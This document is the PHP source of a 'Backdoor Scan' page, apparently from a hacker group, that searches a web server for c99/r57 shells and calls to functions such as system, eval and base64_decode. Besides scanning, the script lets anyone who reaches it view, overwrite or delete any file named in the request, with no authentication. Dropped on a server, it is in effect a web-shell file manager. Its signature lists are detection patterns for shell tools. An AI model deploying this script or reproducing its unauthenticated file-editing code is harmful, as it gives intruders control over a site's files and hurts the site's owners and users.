Scan shell

1. <?php
2.  
3. ?>
4. <head>
5. <title>Tatsumi-Crew | Backdoor Scan</title>
6. <link rel="SHORTCUT ICON" href="favicon.png" type="image/png">
7. <meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
8. <meta name="keywords" content="No Code No life"/>
9. <meta name="description" content="No Code No life">
10. <meta name="author" content="No Code No life">
11. <meta name='rating' content='general' />
12. <meta name='geo.country' content='id' />
13. <meta name='geo.placename' content='Indonesia' />
14. <meta name='robots' content='all'/>
15. <meta name='robots' content='index, follow' />
16. <meta name='robots schedule' content='auto'/>
17. <meta name='revisit-after' content='1 days' />
18. <meta name='googlebot' content='index,follow'/>
19. <meta name='distribution' content='global'/>
20. <meta contact='nako48@cyber00t.biz'/>
21. <link rel="stylesheet" href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css'>
22. <style>
23. @import url('https://fonts.googleapis.com/css?family=Permanent+Marker|Nova+Square|Supermercado+One|VT323');
24. body {
25. background-color: #2C3A49;
26. background-repeat: no-repeat;
27. background-position: center;
28. background-size: 100% 100%;
29. background-attachment: fixed;
30. color: white;
31. text-align: center;
32. font-size: 10pt;
33. font-family: 'Supermercado One', cursive;
34. letter-spacing: 2px;
35. line-height: 25px;
36. }
37. h1 {
38. font-family: 'VT323', cursive;
39. }
40. .header {
41. padding-top: 10%;
42. font-size: 56pt;
43. }
44. .content{
45. font-size:16pt;
46. }
47. .footerholder {
48. background: none repeat scroll 0 0 transparent;
49. bottom: 0;
50. position: fixed;
51. text-align: right;
52. width: 100%;
53. font-family: 'Nova Square', cursive;
54. }
55.  
56. .footer {
57. background: none repeat scroll 0 0 transparent;
58. margin: auto;
59. font-family: 'Nova Square', cursive;
60. width: 90%;
61. }
62. a {
63. color:#ffffff;
64. text-decoration:blink;
65. transition:all .30s ease-in-out;
66. }
67.  
68. a:hover{
69. color:#2980B9;
70. }
71. .blinking-cursor {
72. font-weight: 100;
73. font-size: 20px;
74. color: white;
75. font-family: 'VT323', monospace;
76. -webkit-animation: 1s blink step-end infinite;
77. -moz-animation: 1s blink step-end infinite;
78. -ms-animation: 1s blink step-end infinite;
79. -o-animation: 1s blink step-end infinite;
80. animation: 1s blink step-end infinite;
81. }
82.  
83. @keyframes 'blink' {
84. from, to {
85. color: transparent;
86. }
87. 50% {
88. color: white;
89. }
90. }
91.  
92. @-moz-keyframes blink {
93. from, to {
94. color: transparent;
95. }
96. 50% {
97. color: white;
98. }
99. }
100.  
101. @-webkit-keyframes 'blink' {
102. from, to {
103. color: transparent;
104. }
105. 50% {
106. color: white;
107. }
108. }
109.  
110. @-ms-keyframes 'blink' {
111. from, to {
112. color: transparent;
113. }
114. 50% {
115. color: white;
116. }
117. }
118.  
119. @-o-keyframes 'blink' {
120. from, to {
121. color: transparent;
122. }
123. 50% {
124. color: white;
125. }
126. }
127. </style>
128. <body>
129. </head>
130. <center>
131. <center></center><br>
132. <?php
133. if(isset($_REQUEST['edit']) && $_REQUEST['edit']=='file'){
134. if(isset($_POST['yes'])){
135. $filename = $_GET['file'];
136. echo "<br><br><br><font color=red size=3><b><center>".$filename." deleted...</b></font><br><br><br><br><br><br><br>";
137. unlink($filename);
138. echo "<META HTTP-EQUIV=Refresh CONTENT=\"2; URL=javascript:window.close();\">";
139. }else{
140. if($_POST['update']) {
141. $filename = $_POST['file'];
142. if(is_writable($filename)) {
143. $handle = fopen($filename, "w+");
144. $isi=$_POST['content'];
145. fwrite($handle, stripslashes($isi));
146. fclose($handle);
147. $stat= "<center><strong>edited successfully<br>";
148. } else {
149. $stat= "<center><font color=red><strong>Error! File may not be writable.</font></center>";
150. }
151. }
152. if($_POST['close']) {
153. echo "<META HTTP-EQUIV=Refresh CONTENT=\"0; URL=javascript:window.close();\">";
154. }
155. $filename = $_GET['file'];
156. if (file_exists($filename)){
157. $vuln = $_GET['bug'];
158. $handle = fopen($filename, "r");
159. $contents = fread($handle, filesize($filename));
160. ?>
161. <center>
162. <table>
163. <tr><td align="left" class="me"><strong><?=$filename?>&nbsp;&nbsp;>> Contains :&nbsp;<?=$vuln?></strong></td></tr>
164. <tr><td class="me">
165. <form method="post" action="">
166. <input type="hidden" name="file" value="<?=$filename?>">
167. <textarea name="content" cols="80" rows="15"><?=htmlspecialchars($contents)?></textarea><br>
168. </td></tr>
169. <tr><td align="center" class="me">
170. <?php
171. if($_POST['delete']) {
172. echo "Are you sure to delete ".$filename." ?";
173. ?>
174. <tr><td align="center" class="me">
175. <input type="submit" name="yes" value=" Y E S ">
176. <input type="submit" name="no" value=" N O ">
177. </td></tr>
178. <?php
179. }else{
180. echo $stat;
181. ?>
182. </td></tr>
183. <tr><td align="right" class="me">
184. <input type="submit" name="close" value=" C l o s e ">
185. <input type="submit" name="delete" value=" D e l e t e ">
186. <input type="submit" name="update" value=" S a v e ">
187. </td></tr>
188. <?php
189. }
190. fclose($handle);
191. ?>
192. </table>
193. </form>
194. <?php
195. }else{
196. echo "<br><br><br><font color=red size=3><b><center>".$filename." not exist...</b></font><br><br><br><br><br><br><br>";
197. echo "<META HTTP-EQUIV=Refresh CONTENT=\"4; URL=javascript:window.close();\">";
198. }
199. ?>
200. </center>
201. <?php
202. }
203. }elseif(isset($_POST['Submit'])){
204. $ceks = array('base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
205. foreach($ceks as $ceker){
206. if($_POST[$ceker]<>""){
207. $six.=$_POST[$ceker].".";
208. }
209. }
210. $cek = explode('.', $six);
211.  
212. function ListFiles($dir) {
213. if($dh = opendir($dir)) {
214.  
215. $files = Array();
216. $inner_files = Array();
217.  
218. while($file = readdir($dh)) {
219. if($file != "." && $file != "..") {
220. if(is_dir($dir . "/" . $file)) {
221. $inner_files = ListFiles($dir . "/" . $file);
222. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
223. } else {
224. array_push($files, $dir . "/" . $file);
225. }
226. }
227. }
228.  
229. closedir($dh);
230. return $files;
231. }
232. }
233. ?>
234. <center>
235. <table border="0" width="90%" cellpadding="5">
236. <tr>
237. <td class="me" align="right" width="30"><b>No</b></td>
238. <td class="me" align="center" width="105"><b> T y p e </b></td>
239. <td class="me" align="center"><b> F i l e&nbsp;&nbsp;L o c a t i o n </b></td>
240. <td class="me" align="center" width="150"><b> L a s t&nbsp;&nbsp;E d i t </b></td>
241. <td class="me" align="right" width="80"><b>F i l e&nbsp;&nbsp;S i z e</b></td>
242. </tr><br>
243. <?php
244. $target=$_SERVER['DOCUMENT_ROOT'];
245. foreach (ListFiles($target) as $key=>$file){
246. $nFile = substr($file, -4, 4);
247. if($nFile == ".php"){
248. if($file==$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF']){
249. }else{
250. $ops = @file_get_contents($file);
251. $op=strtolower($ops);
252. $arr = array('c99_buff_prepare' => 'c 9 9',
253. 'abcr57' => 'r 5 7');
254. $sis=0;
255. if($op)
256. $size=filesize($file);
257.  
258. $last=date("M-d-Y H:i", $last_modified);
259. foreach($arr as $key => $val) {
260. if(@preg_match("/$key/", $op)) {
261. $sis=1;
262. $i++;
263. ?>
264. <tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
265. <td align="right"><font color="red"><blink><?=$i?></blink></font></td>
266. <td align="center"><font color="red"><blink><?=$val?></blink></font></td>
267. <td align="left"><blink>
268. <a href="#" class="abunai" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$val?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
269. </blink></td>
270. <td align="center"><font color="red"><blink><?=$last?> GMT+9</blink></font></td>
271. <td align="right"><font color="red"><blink><?=$size?> byte</blink></font></td>
272. <script language="javascript">
273. var bgcolor = "transparent";
274. var change_color = "#444444"
275. function mover(aa) {
276. aa.style.backgroundColor = change_color;
277. }
278. function mout(aa) {
279. aa.style.backgroundColor = bgcolor;
280. }
281. </script>
282. </tr>
283. <?php
284. }
285. }
286. if($sis<>"1"){
287. if((@preg_match("/system\((.*?)\)/", $op))&&(@preg_match("/<pre>/", $op))&&(@preg_match("/empty\((.*?)\)/", $op))) {
288. $sis="2";
289. $i++;
290. $val="hidden shell";
291. ?>
292. <tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
293. <td align="right"><font color="blue"><?=$i?></font></td>
294. <td align="center"><font color="blue"><?=$val?></font></td>
295. <td align="left">
296. <a href="#" class="xxx" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$val?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
297. </td>
298. <td align="center"><font color="blue"><?=$last?> GMT+9</font></td>
299. <td align="right"><font color="blue"><?=$size?> byte</font></td>
300. <script language="javascript">
301. var bgcolor = "transparent";
302. var change_color = "#444444"
303. function mover(aa) {
304. aa.style.backgroundColor = change_color;
305. }
306. function mout(aa) {
307. aa.style.backgroundColor = bgcolor;
308. }
309. </script>
310. </tr>
311. <?php
312. }
313. }
314. if($sis=="0"){
315. foreach($cek as $bugs) {
316. if ($bugs<>""){
317. if(@preg_match("/$bugs\((.*?)\)/", $op)) {
318. $i++;
319. ?>
320. <tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
321. <td align="right"><?=$i?></td>
322. <td align="center"><?=$bugs?></td>
323. <td align="left">
324. <a href="#" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$bugs?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
325. </td>
326. <td align="center"><?=$last?> GMT+9</td>
327. <td align="right"><?=$size?> byte</td>
328. <script language="javascript">
329. var bgcolor = "transparent";
330. var change_color = "#444444"
331. function mover(aa) {
332. aa.style.backgroundColor = change_color;
333. }
334. function mout(aa) {
335. aa.style.backgroundColor = bgcolor;
336. }
337. </script>
338. </tr>
339. <?php
340. }
341. }
342. }
343. }
344. if($_POST['textV']<>""){
345. $text=$_POST['textV'];
346. if(@preg_match("/$text/", $op)) {
347. $i++;
348. ?>
349. <tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
350. <td align="right"><?=$i?></td>
351. <td align="center"><?=$text?></td>
352. <td align="left">
353. <a href="#" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$text?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
354. </td>
355. <td align="center"><?=$last?> GMT+9</td>
356. <td align="right"><?=$size?> byte</td>
357. <script language="javascript">
358. var bgcolor = "transparent";
359. var change_color = "#444444"
360. function mover(aa) {
361. aa.style.backgroundColor = change_color;
362. }
363. function mout(aa) {
364. aa.style.backgroundColor = bgcolor;
365. }
366. </script>
367. </tr>
368. <?php
369. }
370.  
371.  
372. }
373. }
374. }
375. }
376. if($i==0){
377. foreach($cek as $bugs) {
378. if ($bugs<>""){
379. $x++;
380. ?>
381. <tr style ="background-color: Your background Color;" onmouseover="mover(this)" onmouseout="mout(this)">
382. <td align="right"><?=$x?></td>
383. <td align="center"><?=$bugs?></td>
384. <td align="center"> not exist </td>
385. <td align="center"> no record </td>
386. <td align="right"> -&nbsp;&nbsp;&nbsp;&nbsp;byte </td>
387. </tr>
388. <?php
389. }
390. }
391. }
392. ?>
393. </table>
394. <?php
395. }else{
396. $find = array('default','base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
397. ?>
398. <form id="fCheck" name="fCheck" method="post" action="" autocomplete="off">
399. <center>
400. <table class="single" width="400" border="1" -webkit-box-shadow: 0px 0px 15px #55FF55; cellpadding="10">
401. <tr><td class="me"><center>
402. <b>S e l e c t &nbsp;&nbsp;s c a n&nbsp;&nbsp;t y p e :</b><br>
403. <table class="me" width="200">
404. <tr><td class="me">
405. <script language="javascript">
406. function cekKlik(){
407. if (!document.fCheck.cekV.checked)
408. document.fCheck.textV.disabled=true;
409. else
410. document.fCheck.textV.disabled=false;
411. if(document.fCheck.cekV.checked){
412. master = master + 1;
413. }else{
414. if(master > 0 ){
415. master = master - 1;
416. }else{
417. master = master;
418. }
419. }
420. if(master != 0){
421. document.fCheck.Submit.disabled=false;
422. }else{
423. document.fCheck.Submit.disabled=true;
424. }
425. }
426. </script>
427. <?php
428. //dari sini
429. foreach($find as $bug) {
430. ?>
431. <script language="javascript">
432. var master = 0;
433. function checkValue<?=$bug?>(){
434. if(document.fCheck.<?=$bug?>.checked){
435. master = master + 1;
436. }else{
437. if(master > 0 ){
438. master = master - 1;
439. }else{
440. master = master;
441. }
442. }
443. if(master != 0){
444. document.fCheck.Submit.disabled=false;
445. }else{
446. document.fCheck.Submit.disabled=true;
447. }
448. }
449. </script>
450. <input onclick="checkValue<?=$bug?>();" name="<?=$bug?>" type="checkbox" id="<?=$bug?>" value="<?=$bug?>" />&nbsp;<?=$bug?><br>
451. <?php
452. }
453. ?>
454. <input name="cekV" type="checkbox" onClick="cekKlik();" id="cekV" value="cekV">
455. <input class="isi" disabled="disabled" name="textV" value="other key word" onFocus="this.select()" type="text" id="textV">
456. <br><br>
457. <input type="hidden" name="asal" value="abcd">
458. <center>
459. <input disabled="disabled" type="submit" name="Submit" value=" S t a r t&nbsp;&nbsp;S c a n " /></center>
460. </td></tr>
461. </table>
462. </td></tr></table>
463. </form>
464. <?
465. }
466. ?>
467. <br><br><hr width="300">
468. <center>
469. Arvan | Nako &copy Magelang1337
470. <br><br>
471. </body>